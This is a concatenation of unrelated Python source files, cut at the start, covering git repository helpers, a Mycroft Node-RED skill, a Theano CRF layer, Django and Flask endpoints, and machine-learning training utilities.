cmd = "git blame -p -L " + str(line) + "," + str(line) + " \"" + f + "\"" # space before the quoted path so the file is a separate argument
try:
sub = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response, err = sub.communicate()
response = response.decode()
err = err.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
if 'fatal' in err:
return author
data_by_line = response.split('\n')
for row in data_by_line:
if row[:7] == 'author ':
author = row[7:]
break
return author
def getRepo(folder):
cmd = 'git config --get remote.origin.url'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def getBranch(folder):
cmd = 'git branch | grep \'*\''
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response[2:]
def getDiff(folder):
cmd = 'git diff --name-status HEAD..HEAD~'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def checkoutRevision(folder, prev):
cmd = 'git checkout HEAD~' + str(int(prev))
cwd = os.getcwd()
os.chdir(folder)
try:
sub = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, err = sub.communicate()
err = err.decode()
except subprocess.CalledProcessError as e:
print('exception')
print(e.output)
os.chdir(cwd)
return err
def resetHead(folder, branch):
cmd = 'git checkout ' + branch
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def getFileCount(folder):
cmd = 'git ls-files | wc -l'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response.strip()
def getLineCount(folder):
cmd = 'git ls-files | xargs wc -l'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
response = response[:-1].split('\n')
return response[-1]
def getLastCommit(folder):
cmd = 'git log -1 --date=local'
cwd = os.getcwd()
os.chdir(folder)
try:
response = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
response = response.decode()
except subprocess.CalledProcessError as e:
print(e.output)
response = ''
os.chdir(cwd)
return response
def getLastCommitDate(folder):
msg = getLastCommit(folder)
lines = msg.split('\n')
for line in lines:
if 'Date:' in line:
return line[5:].strip()
return 'Date not found.'
def getCommitNumber(folder):
msg = getLastCommit(folder)
lines = msg.split('\n')
return lines[0][7:14]
def parseRepo(url):
#url = url.decode()
splat = url.split('/')
splat = splat[-1].split('.')
splat = splat[0].split('\n')
return splat[0]
def getBaseRepoName(folder):
repo = getRepo(folder)
base = parseRepo(repo)
return base
if __name__ == '__main__':
cwd = os.getcwd()
f = cwd + '/birdseye.py'
folder = os.path.split(f)[0]
line = 20
print()
print("Get author: ")
print(getAuthor(f,line))
#branch = getBranch(folder)
#print(resetHead(folder,branch))
#print(checkoutRevision(folder,10))
print()
print("Line count: " + getLineCount(folder))
file_count = getFileCount(folder)
print()
print("File count: " + file_count)
last_commit = getLastCommit(folder)
print()
print("Last commit: ")
print(last_commit)
last_commit_date = getLastCommitDate(folder)
print()
print("Last commit date: ")
print(last_commit_date)
commit_number = getCommitNumber(folder)
print()
print("Last commit number: ")
print(commit_number)
repo = getRepo(folder)
print()
print("Repo: " + repo)
base = parseRepo(repo)
print()
print("Base: " + base)
print("Base repo name: " + getBaseRepoName(folder))
print()
#print(resetHead(folder,branch))
|
55475
|
from mycroft.messagebus.message import Message, dig_for_message
from mycroft.skills.core import FallbackSkill, intent_file_handler, intent_handler
from adapt.intent import IntentBuilder
from jarbas_hive_mind_red import get_listener
from jarbas_hive_mind.settings import CERTS_PATH
from jarbas_hive_mind.database import ClientDatabase
from jarbas_utils import create_daemon
import time
class NodeRedSkill(FallbackSkill):
def __init__(self):
super(NodeRedSkill, self).__init__(name='NodeRedSkill')
# can not reload, twisted reactor can not be restarted
self.reload_skill = False
if "timeout" not in self.settings:
self.settings["timeout"] = 15
if "secret" not in self.settings:
self.settings["secret"] = "unsafe"
if "priority" not in self.settings:
self.settings["priority"] = 50
# TODO pass these to hivemind / settingsmeta
if "host" not in self.settings:
self.settings["host"] = "127.0.0.1"
if "port" not in self.settings:
self.settings["port"] = 6789
if "ip_list" not in self.settings:
self.settings["ip_list"] = []
if "ip_blacklist" not in self.settings:
self.settings["ip_blacklist"] = True
if "safe_mode" not in self.settings:
self.settings["safe_mode"] = False
if "message_whitelist" not in self.settings:
self.settings["message_whitelist"] = []
if "cert" not in self.settings:
self.settings["cert"] = CERTS_PATH + '/red.crt'
if "key" not in self.settings:
self.settings["key"] = CERTS_PATH + '/red.key'
if "ssl" not in self.settings:
self.settings["ssl"] = False
self.waiting_for_node = False
self.conversing = False
self.old_key = self.settings["secret"]
self._error = None
self.settings_change_callback = self.on_web_settings_change
def initialize(self):
self.register_fallback(self.handle_fallback,
int(self.settings["priority"]))
self.add_event("node_red.success", self.handle_node_success)
self.add_event("node_red.intent_failure", self.handle_node_failure)
self.add_event("node_red.converse.activate",
self.handle_converse_enable)
self.add_event("node_red.converse.deactivate",
self.handle_converse_disable)
self.add_event("hive.client.connection.error",
self.handle_wrong_key)
self.converse_thread = create_daemon(self.converse_keepalive)
self.node_setup()
def on_web_settings_change(self):
self.change_password()
def change_password(self, force=False):
with ClientDatabase() as db:
mail = "<EMAIL>"
name = "nodered"
key = self.settings["secret"]
if not force:
if self.old_key != key:
db.change_key(self.old_key, key)
self.old_key = key
self.speak_dialog("change_key", wait=True)
self.speak_dialog("please_reboot")
self.set_context("KEY_CHANGED")
else:
db.add_client(name, mail, key, crypto_key=None)
@intent_handler(IntentBuilder("WhyRebootIntent")
.require("WhyKeyword").require("KEY_CHANGED"))
def handle_why_reboot(self, message):
self.speak_dialog("why", wait=True)
def handle_wrong_key(self, message):
error = message.data.get("error")
if self._error is None or error != self._error:
self.speak_dialog("bad_key")
self.speak(error)
self._error = error
def node_setup(self):
self.change_password(force=True)
self.node = get_listener(bus=self.bus)
config = {
"port": self.settings["port"],
"host": self.settings["host"],
"ssl":
{"use_ssl": self.settings["ssl"]}
}
self.node.load_config(config)
self.node._autorun = False
self.node.listen()
def shutdown(self):
self.node.stop_from_thread()
if self.converse_thread.running:
self.converse_thread.join(2)
super(NodeRedSkill, self).shutdown()
def get_intro_message(self):
# welcome dialog on skill install
self.speak_dialog("intro")
# node red control intents
@intent_file_handler("pingnode.intent")
def handle_ping_node(self, message):
self.speak("ping")
def pong(message):
self.speak("pong")
self.bus.once("node_red.pong", pong)
message = message.forward("node_red.ping")
self.bus.emit(message)
@intent_file_handler("converse.enable.intent")
def handle_converse_enable(self, message):
if self.conversing:
self.speak_dialog("converse_on")
else:
self.speak_dialog("converse_enable")
self.conversing = True
@intent_file_handler("converse.disable.intent")
def handle_converse_disable(self, message):
if not self.conversing:
self.speak_dialog("converse_off")
else:
self.speak_dialog("converse_disable")
self.conversing = False
# node red event handlers
def handle_node_success(self, message):
self.waiting_for_node = False
self.success = True
def handle_node_failure(self, message):
self.waiting_for_node = False
self.success = False
def wait_for_node(self):
start = time.time()
self.success = False
self.waiting_for_node = True
while self.waiting_for_node and \
time.time() - start < float(self.settings["timeout"]):
time.sleep(0.1)
if self.waiting_for_node:
message = dig_for_message()
if not message:
message = Message("node_red.timeout")
else:
message = message.reply("node_red.timeout")
self.bus.emit(message)
self.waiting_for_node = False
return self.success
# converse
def converse_keepalive(self):
while True:
if self.conversing:
# avoid converse timed_out
self.make_active()
time.sleep(60)
def converse(self, utterances, lang="en-us"):
if self.conversing:
message = dig_for_message()
if message:
message = message.reply("node_red.converse",
{"utterance": utterances[0]})
else:
message = Message("node_red.converse",
{"utterance": utterances[0]})
if not message.context.get("platform", "").startswith("NodeRedMind"):
self.bus.emit(message)
return self.wait_for_node()
return False
# fallback
def handle_fallback(self, message):
message = message.reply("node_red.fallback", message.data)
self.bus.emit(message)
return self.wait_for_node()
def create_skill():
return NodeRedSkill()
|
55484
|
import os
import numpy as np
import random
from math import isclose
import torch
import matplotlib.pyplot as plt
from modelZoo.DyanOF import OFModel, fista
from torch.autograd import Variable
import torch.nn
def gridRing(N):
# epsilon_low = 0.25
# epsilon_high = 0.15
# rmin = (1 - epsilon_low)
# rmax = (1 + epsilon_high)
epsilon_low = 0.25
epsilon_high = 0.15
rmin = (1 - epsilon_low)
rmax = (1 + epsilon_high)
thetaMin = 0.001
thetaMax = np.pi / 2 - 0.001
delta = 0.001
# Npole = int(N / 4)
Npole = int(N/2)
Pool = generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax)
M = len(Pool)
idx = random.sample(range(0, M), Npole)
P = Pool[idx]
Pall = np.concatenate((P, -P, np.conjugate(P), np.conjugate(-P)), axis=0)
return P, Pall
## Generate the grid on poles
def generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax):
rmin2 = pow(rmin, 2)
rmax2 = pow(rmax, 2)
xv = np.arange(-rmax, rmax, delta)
x, y = np.meshgrid(xv, xv, sparse=False)
mask = np.logical_and(np.logical_and(x ** 2 + y ** 2 >= rmin2, x ** 2 + y ** 2 <= rmax2),
np.logical_and(np.angle(x + 1j * y) >= thetaMin, np.angle(x + 1j * y) <= thetaMax))
px = x[mask]
py = y[mask]
P = px + 1j * py
return P
def getRowSparsity(inputDict):
rowNum = inputDict.shape[0]
L = inputDict.shape[1]
count = 0
for i in range(0, rowNum):
dictRow = inputDict[i,:].unsqueeze(0)
if len(dictRow.nonzero()) <= round(0.6*L):
count+=1
else:
continue
rowSparsity = count
return rowSparsity
def get_recover_fista(D, y, key_set, param, gpu_id):
if type(D) is np.ndarray:
D = torch.Tensor(D)
D_r = D[key_set]
if len(y.shape)==3:
y_r = y[:,key_set]
else:
y_r = y[key_set]
if D.is_cuda:
c_r = fista(D_r, y_r, param, 100, gpu_id)
y_hat = torch.matmul(D, c_r)
else:
c_r = fista(D_r.cuda(gpu_id), y_r, param, 100, gpu_id)
y_hat = torch.matmul(D.cuda(gpu_id), c_r)
return y_hat
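# Quick sanity check (illustration only; not part of the original file):
# gridRing(N) samples N/2 poles in the first quadrant of the ring
# rmin <= |p| <= rmax (0.75 to 1.15) and mirrors them via -P and conjugation,
# so every returned pole stays inside the ring.
if __name__ == '__main__':
    P, Pall = gridRing(8)
    assert len(Pall) == 4 * len(P)
    assert np.all((np.abs(Pall) >= 0.75 - 1e-9) & (np.abs(Pall) <= 1.15 + 1e-9))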
|
55500
|
import csv
import itertools
def _boolean(data):
if data == "False":
result = False
else:
result = True
return result
def row_to_location(row):
if row[4] == "0":
sub = False
nosub = True
else:
sub = True
nosub = False
tss = _boolean(row[6])
term = _boolean(row[8])
return {"have no sub-operons": nosub, "have sub-operons": sub,
"start with tss": tss, "stop with terminator": term}
def plus_num(num_total, strain, type_):
num_total["total"][type_] += 1
num_total[strain][type_] += 1
num_total["total"]["total"] += 1
num_total[strain]["total"] += 1
def print_stat(operons, total_num, class_operon, out):
num_features = {}
out.write("Total number of operons is {0}\n".format(total_num))
out.write("The sub operon and features:\n")
for operon in operons:
for it in range(1, 5):
for features in itertools.combinations(operon.keys(), it):
check_key = 0
for key in features:
if operon[key]:
if it == 1:
if key in num_features.keys():
num_features[key] += 1
else:
num_features[key] = 1
check_key += 1
if (check_key == it) and (it != 1):
key = " and ".join(features)
if key in num_features.keys():
num_features[key] += 1
else:
num_features[key] = 1
for key, value in num_features.items():
out.write("\tthe number of operons which {0} = {1} ({2})\n".format(
key, value, float(value) / float(total_num)))
out.write("mono/polycistronic:\n")
out.write("\tmonocistronic: {0} ({1})\n".format(
class_operon["mono"],
float(class_operon["mono"]) / float(class_operon["total"])))
out.write("\tpolycistronic: {0} ({1})\n".format(
class_operon["poly"],
float(class_operon["poly"]) / float(class_operon["total"])))
def stat(input_file, out_file):
out = open(out_file, "w")
operons = {}
operons_all = []
tmp_id = ""
f_h = open(input_file, "r")
pre_seq_id = ""
total_num = {}
total_num_all = 0
class_operon = {}
class_operon["total"] = {"na": 0, "mono": 0, "poly": 0, "total": 0}
for row in csv.reader(f_h, delimiter="\t"):
if row[0] != "Operon_ID":
if row[0] != tmp_id:
if pre_seq_id != row[1]:
pre_seq_id = row[1]
operons[row[1]] = []
total_num[row[1]] = 0
class_operon[row[1]] = {"na": 0, "mono": 0,
"poly": 0, "total": 0}
operons[row[1]].append(row_to_location(row))
operons_all.append(row_to_location(row))
total_num[row[1]] += 1
total_num_all += 1
if row[-1] == "NA":
plus_num(class_operon, row[1], "na")
elif len(row[-1].split(",")) == 1:
plus_num(class_operon, row[1], "mono")
elif len(row[-1].split(",")) > 1:
plus_num(class_operon, row[1], "poly")
tmp_id = row[0]
if len(operons) > 1:
out.write("All genomes:\n")
print_stat(operons_all, total_num_all, class_operon["total"], out)
for strain in operons.keys():
out.write("\n" + strain + ":\n")
print_stat(operons[strain], total_num[strain],
class_operon[strain], out)
out.close()
f_h.close()
|
55517
|
import argparse
import os
class Opts:
def __init__(self):
self.parser = argparse.ArgumentParser()
def init(self):
self.parser.add_argument('-expID', default='default', help='Experiment ID')
self.parser.add_argument('-data', default='default', help='Input data folder')
self.parser.add_argument('-nThreads', default=4, type=int, help='Number of threads')
self.parser.add_argument('-expDir', default='../exp', help='Experiments directory')
self.parser.add_argument('-scaleAugFactor', default=0.25, type=float, help='Scale augment factor')
self.parser.add_argument('-rotAugProb', default=0.4, type=float, help='Rotation augment probability')
self.parser.add_argument('-flipAugProb', default=0.5, type=float, help='Flip augment probability')
self.parser.add_argument('-rotAugFactor', default=30, type=float, help='Rotation augment factor')
self.parser.add_argument('-colorAugFactor', default=0.2, type=float, help='Color augment factor')
self.parser.add_argument('-imgSize', default=368, type=int, help='Input image size')
self.parser.add_argument('-hmSize', default=46, type=int, help='Heatmap size')
self.parser.add_argument('-DEBUG', type=int, default=0, help='Debug')
self.parser.add_argument('-sigmaPAF', default=5, type=int, help='Width of PAF')
self.parser.add_argument('-sigmaHM', default=7, type=int, help='Std. of Heatmap')
self.parser.add_argument('-variableWidthPAF', dest='variableWidthPAF', action='store_true', help='Variable width PAF based on length of part')
self.parser.add_argument('-dataset', default='coco', help='Dataset')
self.parser.add_argument('-model', default='vgg', help='Model')
self.parser.add_argument('-batchSize', default=8, type=int, help='Batch Size')
self.parser.add_argument('-LR', default=1e-3, type=float, help='Learn Rate')
self.parser.add_argument('-nEpoch', default=150, type=int, help='Number of Epochs')
self.parser.add_argument('-dropLR', type=float, default=50, help='Drop LR')
self.parser.add_argument('-valInterval', type=int, default=1, help='Val Interval')
self.parser.add_argument('-loadModel', default='none', help='Load pre-trained')
self.parser.add_argument('-train', dest='train', action='store_true', help='Train')
self.parser.add_argument('-vizOut', dest='vizOut', action='store_true', help='Visualize output?')
self.parser.add_argument('-criterionHm', default='mse', help='Heatmap Criterion')
self.parser.add_argument('-criterionPaf', default='mse', help='PAF Criterion')
def parse(self):
self.init()
self.opt = self.parser.parse_args()
self.opt.saveDir = os.path.join(self.opt.expDir, self.opt.expID)
if self.opt.DEBUG > 0:
self.opt.nThreads = 1
args = dict((name, getattr(self.opt, name)) for name in dir(self.opt)
if not name.startswith('_'))
if not os.path.exists(self.opt.saveDir):
os.makedirs(self.opt.saveDir)
file_name = os.path.join(self.opt.saveDir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write('==> Args:\n')
for k, v in sorted(args.items()):
opt_file.write(' %s: %s\n' % (str(k), str(v)))
return self.opt
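if __name__ == '__main__':
    # Minimal usage sketch (illustration only): parsing also creates
    # <expDir>/<expID> and writes the chosen options to opt.txt there.
    opt = Opts().parse()
    print(opt.saveDir, opt.batchSize, opt.LR)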
|
55519
|
import komand
from .schema import ListAllActivityMonitorMatchesInput, ListAllActivityMonitorMatchesOutput
# Custom imports below
class ListAllActivityMonitorMatches(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="list_all_activity_monitor_matches",
description="Fetches a list of all activity monitor matches, " "sorted by the creation time of the match",
input=ListAllActivityMonitorMatchesInput(),
output=ListAllActivityMonitorMatchesOutput(),
)
def run(self, params={}):
max_results = params.get("max_results", 100)
api = self.connection.api
return {"activity_monitor_matches": api.list_all_activity_monitor_matches(max_results=max_results)}
|
55526
|
import flatdata.archive
import flatdata.resources
class n_A(flatdata.archive.Archive):
_SCHEMA = """namespace n {
archive A
{
}
}
"""
_NAME = "A"
_RESOURCES = {
"A.archive" : flatdata.archive.ResourceSignature(
container=flatdata.resources.RawData,
initializer=None,
schema=_SCHEMA,
is_optional=False,
doc="Archive signature"),
}
def __init__(self, resource_storage):
flatdata.archive.Archive.__init__(self, resource_storage)
|
55534
|
import theano
import numpy
# CRF implementation based on Lample et al.
# "Neural Architectures for Named Entity Recognition"
floatX=theano.config.floatX
def log_sum(x, axis=None):
x_max_value = x.max(axis=axis)
x_max_tensor = x.max(axis=axis, keepdims=True)
return x_max_value + theano.tensor.log(theano.tensor.exp(x - x_max_tensor).sum(axis=axis))
def forward(observation_weights, transition_weights, return_best_sequence=False):
def recurrence(observation_weights, previous_scores, transition_weights):
previous_scores = previous_scores.dimshuffle(0, 1, 'x')
observation_weights = observation_weights.dimshuffle(0, 'x', 1)
scores = previous_scores + observation_weights + transition_weights.dimshuffle('x', 0, 1)
if return_best_sequence:
best_scores = scores.max(axis=1)
best_states = scores.argmax(axis=1)
return best_scores, best_states
else:
return log_sum(scores, axis=1)
initial = observation_weights[0]
crf_states, _ = theano.scan(
fn=recurrence,
outputs_info=(initial, None) if return_best_sequence else initial,
sequences=[observation_weights[1:],],
non_sequences=transition_weights
)
if return_best_sequence:
sequence, _ = theano.scan(
fn=lambda beta_i, previous: beta_i[theano.tensor.arange(previous.shape[0]), previous],
outputs_info=theano.tensor.cast(theano.tensor.argmax(crf_states[0][-1], axis=1), 'int32'),
sequences=theano.tensor.cast(crf_states[1][::-1], 'int32')
)
sequence = theano.tensor.concatenate([sequence[::-1], [theano.tensor.argmax(crf_states[0][-1], axis=1)]])
return sequence, crf_states[0]
else:
return log_sum(crf_states[-1], axis=1)
def construct(name, input_tensor, n_labels, gold_labels, fn_create_parameter_matrix):
transition_weights = fn_create_parameter_matrix(name + "_crf_transition_weights", (n_labels + 2, n_labels + 2))
small = -1000.0
padding_start = theano.tensor.zeros((input_tensor.shape[0], 1, n_labels + 2)) + small
padding_start = theano.tensor.set_subtensor(padding_start[:,:,-2], 0.0)
padding_end = theano.tensor.zeros((input_tensor.shape[0], 1, n_labels + 2)) + small
padding_end = theano.tensor.set_subtensor(padding_end[:,:,-1], 0.0)
observation_weights = theano.tensor.concatenate([input_tensor, theano.tensor.zeros((input_tensor.shape[0], input_tensor.shape[1], 2)) + small], axis=2)
observation_weights = theano.tensor.concatenate([padding_start, observation_weights, padding_end], axis=1)
observation_weights = observation_weights.dimshuffle(1,0,2) # reordering the tensor (words, sentences, labels)
# Score from tags
real_paths_scores = input_tensor[theano.tensor.arange(input_tensor.shape[0])[:, numpy.newaxis], theano.tensor.arange(input_tensor.shape[1]), gold_labels].sum(axis=1)
# Score from transition_weights
padding_id_start = theano.tensor.zeros((gold_labels.shape[0], 1), dtype=numpy.int32) + n_labels
padding_id_end = theano.tensor.zeros((gold_labels.shape[0], 1), dtype=numpy.int32) + n_labels + 1
padded_gold_labels = theano.tensor.concatenate([padding_id_start, gold_labels, padding_id_end], axis=1)
real_paths_scores += transition_weights[
padded_gold_labels[theano.tensor.arange(gold_labels.shape[0])[:, numpy.newaxis], theano.tensor.arange(gold_labels.shape[1] + 1)],
padded_gold_labels[theano.tensor.arange(gold_labels.shape[0])[:, numpy.newaxis], theano.tensor.arange(gold_labels.shape[1] + 1) + 1]
].sum(axis=1)
all_paths_scores = forward(observation_weights, transition_weights)
best_sequence, scores = forward(observation_weights, transition_weights, return_best_sequence=True)
scores = scores.dimshuffle(1,0,2)[:,:-1,:-2]
best_sequence = best_sequence.dimshuffle(1,0)[:,1:-1]
return all_paths_scores, real_paths_scores, best_sequence, scores
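# Minimal usage sketch (illustration only; the helper and variable names below
# are made up, not from the original file). The CRF training cost is the
# negative log-likelihood of the gold sequence, i.e. the log-partition
# (all_paths_scores) minus the gold-path score, while best_sequence gives the
# Viterbi decoding at prediction time.
if __name__ == "__main__":
    def _create_parameter_matrix(name, shape):
        values = 0.01 * numpy.random.randn(*shape).astype(floatX)
        return theano.shared(values, name=name)

    unary_scores = theano.tensor.tensor3("unary_scores", dtype=floatX)  # (sentences, words, labels)
    gold = theano.tensor.imatrix("gold_labels")                         # (sentences, words)
    all_scores, gold_scores, viterbi_path, _ = construct(
        "example", unary_scores, 5, gold, _create_parameter_matrix)
    crf_cost = (all_scores - gold_scores).mean()  # minimise with any gradient-based optimiser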
|
55613
|
from django.conf.urls import url
from ratelimitbackend import admin
from ratelimitbackend.views import login
from .forms import CustomAuthForm, TokenOnlyAuthForm
urlpatterns = [
url(r'^login/$', login,
{'template_name': 'admin/login.html'}, name='login'),
url(r'^custom_login/$', login,
{'template_name': 'custom_login.html',
'authentication_form': CustomAuthForm},
name='custom_login'),
url(r'^token_login/$', login,
{'template_name': 'token_only_login.html',
'authentication_form': TokenOnlyAuthForm},
name='token_only_login'),
url(r'^admin/', admin.site.urls),
]
|
55683
|
from typing import Union
import flask_restx
import flask
from keepachangelog._changelog import to_dict
def add_changelog_endpoint(
namespace: Union[flask_restx.Namespace, flask_restx.Api], changelog_path: str
):
"""
Create /changelog: Changelog endpoint parsing https://keepachangelog.com/en/1.0.0/
:param namespace: The Flask-RestX namespace.
:param changelog_path: Path to CHANGELOG.md.
"""
@namespace.route("/changelog")
@namespace.doc(
responses={
200: (
"Service changelog.",
[
namespace.model(
"ChangelogReleaseModel",
{
"metadata": namespace.model(
"ChangelogReleaseMetaDataModel",
{
"version": flask_restx.fields.String(
description="Release version following semantic versioning.",
required=True,
example="3.12.5",
),
"release_date": flask_restx.fields.Date(
description="Release date.",
required=True,
example="2019-12-31",
),
},
),
"added": flask_restx.fields.List(
flask_restx.fields.String(description="New features.")
),
"changed": flask_restx.fields.List(
flask_restx.fields.String(
description="Changes in existing functionality."
)
),
"deprecated": flask_restx.fields.List(
flask_restx.fields.String(
description="Soon-to-be removed features."
)
),
"removed": flask_restx.fields.List(
flask_restx.fields.String(
description="Removed features."
)
),
"fixed": flask_restx.fields.List(
flask_restx.fields.String(description="Any bug fixes.")
),
"security": flask_restx.fields.List(
flask_restx.fields.String(
description="Vulnerabilities."
)
),
},
)
],
)
}
)
class Changelog(flask_restx.Resource):
def get(self):
"""
Retrieve service changelog.
"""
try:
return flask.jsonify(to_dict(changelog_path))
except FileNotFoundError:
return flask.jsonify({})
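if __name__ == "__main__":
    # Minimal usage sketch (illustration only; the CHANGELOG.md path is an assumption).
    app = flask.Flask(__name__)
    api = flask_restx.Api(app)
    add_changelog_endpoint(api, "CHANGELOG.md")
    app.run()  # GET /changelog returns the parsed changelog as JSON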
|
55692
|
import tensorflow as tf
import numpy as np
import os
import pickle
from utils.symbolic_network import SymbolicNet, MaskedSymbolicNet, SymbolicCell
from utils import functions, regularization, helpers, pretty_print
import argparse
def main(results_dir='results/sho/test', trials=1, learning_rate=1e-2, reg_weight=2e-4, timesteps=25, batch_size=128,
n_epochs1=2001, n_epochs2=5001, n_epochs3=5001):
# Hyperparameters
summary_step = 500
timesteps0 = 1
primitive_funcs = [
*[functions.Constant()] * 2,
*[functions.Identity()] * 4,
*[functions.Square()] * 4,
*[functions.Sin()] * 2,
*[functions.Exp()] * 2,
*[functions.Sigmoid()] * 2,
*[functions.Product(norm=0.1)] * 2,
]
# Import simple harmonic oscillator (SHO) data
data = np.load('dataset/sho.npz')
x_d = np.asarray(data["x_d"])
x_v = np.asarray(data["x_v"])
y_d = np.asarray(data["y_d"])
y_v = np.asarray(data["y_v"])
omega2_data = data["omega2"]
N = data["N"]
# Prepare data
x = np.stack((x_d, x_v), axis=2) # Shape (N, NT, 2)
y0 = np.stack((y_d[:, 0], y_v[:, 0]), axis=1) # Initial conditions for prediction y, fed into propagator
y_data = np.stack((y_d[:, 1:timesteps + 1], y_v[:, 1:timesteps + 1]), axis=2) # shape(NG, LENGTH, 2)
# Tensorflow placeholders for x, y0, y
x_input = tf.placeholder(shape=(None, x.shape[1], x.shape[2]), dtype=tf.float32, name="enc_input")
y0_input = tf.placeholder(shape=(None, 2), dtype=tf.float32, name="prop_input") # input is d, v
y_input = tf.placeholder(shape=(None, timesteps, 2), dtype=tf.float32, name="label_input")
length_input = tf.placeholder(dtype=tf.int32, shape=())
# Dynamics encoder
encoder = helpers.Encoder()
training = tf.placeholder_with_default(False, [])
z = encoder(x_input, training=training)
z_data = omega2_data[:, np.newaxis]
# Propagating decoders
prop_d = SymbolicNet(2, funcs=primitive_funcs)
prop_v = SymbolicNet(2, funcs=primitive_funcs)
prop_d.build(4)
prop_v.build(4)
# Building recurrent structure
rnn = tf.keras.layers.RNN(SymbolicCell(prop_d, prop_v), return_sequences=True)
y0_rnn = tf.concat([tf.expand_dims(y0_input, axis=1), tf.zeros((tf.shape(y0_input)[0], length_input - 1, 2))],
axis=1)
prop_input = tf.concat([y0_rnn, tf.keras.backend.repeat(z, length_input),
tf.ones((tf.shape(y0_input)[0], length_input, 1))], axis=2)
prop_output = rnn(prop_input)
epoch = tf.placeholder(tf.float32)
reg_freq = np.pi / (n_epochs1 + n_epochs2) / 1.1
reg_loss = tf.sin(reg_freq * epoch) ** 2 * regularization.l12_smooth(prop_d.get_weights()) + \
tf.sin(reg_freq * epoch) ** 2 * regularization.l12_smooth(prop_v.get_weights())
# reg_loss = regularization.l12_smooth(prop_d.get_weights()) + regularization.l12_smooth(prop_v.get_weights())
# Training
learning_rate_ph = tf.placeholder(tf.float32)
opt = tf.train.RMSPropOptimizer(learning_rate=learning_rate_ph)
reg_weight_ph = tf.placeholder(tf.float32)
error = tf.losses.mean_squared_error(labels=y_input[:, :length_input, :], predictions=prop_output)
loss = error + reg_weight_ph * reg_loss
train = tf.group([opt.minimize(loss), encoder.bn.updates])
batch = helpers.batch_generator([x, y_data, y0, z_data], N=N, batch_size=batch_size)
# Training session
with tf.Session() as sess:
for _ in range(trials):
loss_i = np.nan
while np.isnan(loss_i):
loss_list = []
error_list = []
reg_list = []
sess.run(tf.global_variables_initializer())
for i in range(n_epochs1 + n_epochs2):
if i < n_epochs1:
reg_weight_i = reg_weight / 5
learning_rate_i = learning_rate
length_i = min(i // 500 * 2 + timesteps0, timesteps)
else:
reg_weight_i = reg_weight
learning_rate_i = learning_rate / 5
length_i = timesteps
x_batch, y_batch, y0_batch, z_batch = next(batch)
feed_dict = {x_input: x_batch, y0_input: y0_batch, y_input: y_batch,
epoch: i, learning_rate_ph: learning_rate_i, training: True,
reg_weight_ph: reg_weight_i, length_input: length_i}
_ = sess.run(train, feed_dict=feed_dict)
if i % summary_step == 0 or i == n_epochs1 - 1:
feed_dict[training] = False
loss_i, error_i, reg_i = sess.run((loss, error, reg_loss), feed_dict=feed_dict)
z_arr = sess.run(z, feed_dict=feed_dict)
r = np.corrcoef(z_batch[:, 0], z_arr[:, 0])[1, 0]
loss_list.append(loss_i)
error_list.append(error_i)
reg_list.append(reg_i)
print("Epoch %d\tTotal loss: %f\tError: %f\tReg loss: %f\tCorrelation: %f"
% (i, loss_i, error_i, reg_i, r))
if np.isnan(loss_i):
break
# Setting small weights to 0 and freezing them
prop_d_masked = MaskedSymbolicNet(sess, prop_d, threshold=0.01)
prop_v_masked = MaskedSymbolicNet(sess, prop_v, threshold=0.01)
# Keep track of currently existing variables. When we rebuild the rnn, it makes new variables that we need
# to initialize. Later, we will use this to figure out what the uninitialized variables are.
temp = set(tf.global_variables())
# Rebuilding the decoding propagator. Remove regularization
rnn = tf.keras.layers.RNN(SymbolicCell(prop_d_masked, prop_v_masked), return_sequences=True)
prop_output = rnn(prop_input)
loss = tf.losses.mean_squared_error(labels=y_input[:, :length_input, :], predictions=prop_output)
train = tf.group([opt.minimize(loss), encoder.bn.updates])
weights_d = sess.run(prop_d_masked.get_weights())
expr_d = pretty_print.network(weights_d, primitive_funcs, ["d", "v", "z", 1])
print(expr_d)
weights_v = sess.run(prop_v_masked.get_weights())
expr_v = pretty_print.network(weights_v, primitive_funcs, ["d", "v", "z", 1])
print(expr_v)
print("Frozen weights. Next stage of training.")
# Initialize only the uninitialized variables.
sess.run(tf.variables_initializer(set(tf.global_variables()) - temp))
for i in range(n_epochs3):
x_batch, y_batch, y0_batch, z_batch = next(batch)
feed_dict = {x_input: x_batch, y0_input: y0_batch, y_input: y_batch,
epoch: 0, learning_rate_ph: learning_rate / 10, training: True, reg_weight_ph: 0,
length_input: length_i}
_ = sess.run(train, feed_dict=feed_dict)
if i % summary_step == 0:
feed_dict[training] = False
loss_i, error_i, reg_i = sess.run((loss, error, reg_loss), feed_dict=feed_dict)
z_arr = sess.run(z, feed_dict=feed_dict)
r = np.corrcoef(z_batch[:, 0], z_arr[:, 0])[1, 0]
loss_list.append(loss_i)
error_list.append(error_i)
reg_list.append(reg_i)
